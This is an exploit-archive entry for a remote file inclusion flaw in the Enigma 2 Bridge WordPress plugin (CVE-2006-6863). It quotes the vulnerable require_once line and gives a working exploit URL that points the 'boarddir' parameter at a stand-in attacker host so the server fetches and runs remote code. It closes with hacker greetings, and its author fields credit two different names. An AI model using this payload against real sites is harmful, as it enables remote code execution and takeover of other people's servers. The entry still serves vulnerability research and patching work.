WordPress Plugin Enigma 2 Bridge - 'boarddir' Remote File Inclusion
Author: Mehmet Ince
type: webapps
platform: php
port:
date_added: 2006-12-29
date_updated:
verified: 1
codes: OSVDB-33349;CVE-2006-6863
tags:
aliases:
screenshot_url:
application_url:
-----------------------------------------------
Enigma WordPress Bridge (boarddir) Remote File Include
-----------------------------------------------
Author: xoron
-----------------------------------------------
Vuln Code:
require_once($boarddir . '/PortalSources/Portal.ini.php');
-----------------------------------------------
3xplo!t:
WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=http://evil_scripts?
-----------------------------------------------
download: http://www.lunabyte.org/downloads/WordPressBridge.zip
-----------------------------------------------
XORON - XORON - XORON - XORON - XORON
-----------------------------------------------------------
- -
- -
- Tum muslumanlarin kurban bayrami simdiden mubarek olsun -
- -
- Greetz: str0ke, Kacper -
- -
-----------------------------------------------------------
# milw0rm.com [2006-12-30]